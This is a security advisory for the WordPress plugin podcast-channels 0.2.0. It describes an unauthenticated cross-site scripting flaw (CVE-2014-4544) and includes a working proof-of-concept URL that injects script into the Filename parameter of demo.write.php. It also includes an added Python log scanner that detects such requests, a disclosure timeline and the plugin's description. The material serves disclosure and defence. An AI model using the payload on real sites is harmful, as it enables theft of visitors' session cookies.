wp-plugin : podcast-channels

Plugin Details
Plugin Name: wp-plugin : podcast-channels
Affected Version : 0.2.0 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : prajalkulkarni
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :

http://127.0.0.1/wordpress/wp-content/wp-plugs/podcastchannels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
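
An added example, not part of the original advisory: a log check that flags requests to demo.write.php whose Filename parameter decodes to HTML metacharacters, as in the PoC above. The Combined Log Format layout, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script path and parameter name come from the PoC URL in this advisory.
DEMO_PATH = re.compile(r"/getid3/demos/demo\.write\.php$", re.IGNORECASE)
# Characters that let a reflected value close an HTML attribute or open a tag.
HTML_META = re.compile(r"[<>'\"]")
# Request field of an access-log line in Combined Log Format (assumed layout).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines; client addresses are documentation ranges.
BASE = "/wordpress/wp-content/wp-plugs/podcastchannels/getid3/demos/demo.write.php"
SAMPLE_LOG = [
    f'203.0.113.7 - - [25/May/2014:10:00:00 +0000] "GET {BASE}?Filename=Filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E& HTTP/1.1" 200 5120',
    f'203.0.113.7 - - [25/May/2014:10:00:05 +0000] "GET {BASE}?Filename=episode01.mp3 HTTP/1.1" 200 4980',
    '198.51.100.4 - - [25/May/2014:10:01:00 +0000] "GET /wordpress/?s=%3Cb%3E HTTP/1.1" 200 9000',
    f'198.51.100.4 - - [25/May/2014:10:02:00 +0000] "GET {BASE}?Filename=x%2527%253E HTTP/1.1" 200 5001',
]

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %2527) a bounded number of times."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_filename(log_line):
    """Return the decoded Filename value if the line should be flagged, else None."""
    match = REQUEST.search(log_line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    if not DEMO_PATH.search(target.path):
        return None
    # parse_qs percent-decodes once; decode_fully handles double encoding.
    for raw in parse_qs(target.query, keep_blank_values=True).get("Filename", []):
        value = decode_fully(raw)
        if HTML_META.search(value):
            return value
    return None

def scan(lines):
    """Return (line_index, decoded_value) for every flagged line."""
    return [(i, v) for i, line in enumerate(lines)
            if (v := suspicious_filename(line)) is not None]

if __name__ == "__main__":
    for index, value in scan(SAMPLE_LOG):
        print(f"line {index}: Filename={value!r}")
```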


Disclosure Timeline
Vendor Contacted : 2014-01-22
Plugin Status : Updated on 2014-01-11
Public Disclosure : May 25, 2014
CVE Number : CVE-2014-4544
Plugin Description :
What do you need to podcast with Wordpress? Nothing -- Wordpress puts enclosures in the feed for you. That's the bare bones and it works well enough. But iTunes metadata would be nice. And, how about different info in different categories? Podcast Channels lets you specify iTunes metadata for the home feed, specific category feeds, and even 'user defined' ('Conditional') feeds (see the FAQ).

= Setting up Category Channels =
Go to the 'Media > Podcast Channels' page to set up the Site Defaults (it's 'Manage > Podcast Channels' for pre-2.7 WP). If you are not happy with the defaults shown in grey, click in the fields to set your own. If you want the main blog page feed to use this data, tick the 'add to Home Feed' option. To add a podcast channel, choose a blog category from the drop-down menu and click 'Add Category Channel'. When the new channel pops up, there is an 'Add field...' drop-down menu in it that lets you specify defaults for this channel that over-ride the site defaults. Leave a field undefined/blank or the same as the default and it will be removed from the channel definition - which means the value reverts to the site default.

= Fields that don't inherit =
Two fields are channel specific and do not inherit from the site defaults: 'Feed Moving To' is used to tell your podcast users (and the iTunes directory) that the podcast channel is moving to a new URL. 'Feedburner URL' redirects everyone (except the Feedburner site!) to a Feedburner URL so that they can collect stats for you.

= Audio Files in the Media Library =
When you upload an audio file, Podcast Channels adds 'Artist', 'Duration' and 'Explicit' fields to the Media Library. It initially fills in the artist and duration with the information found in the ID3 tags, but you are free to edit the fields. Remember to set the explicit flag to 'Yes' if the content is not suitable for children. Apple are likely to de-list your podcast from the iTunes directory if you do not.

= Copyright and Image =
Podcast Channels adds image and copyright info to all your feeds if you specify it in the extra fields in 'Settings > General' (see screenshots).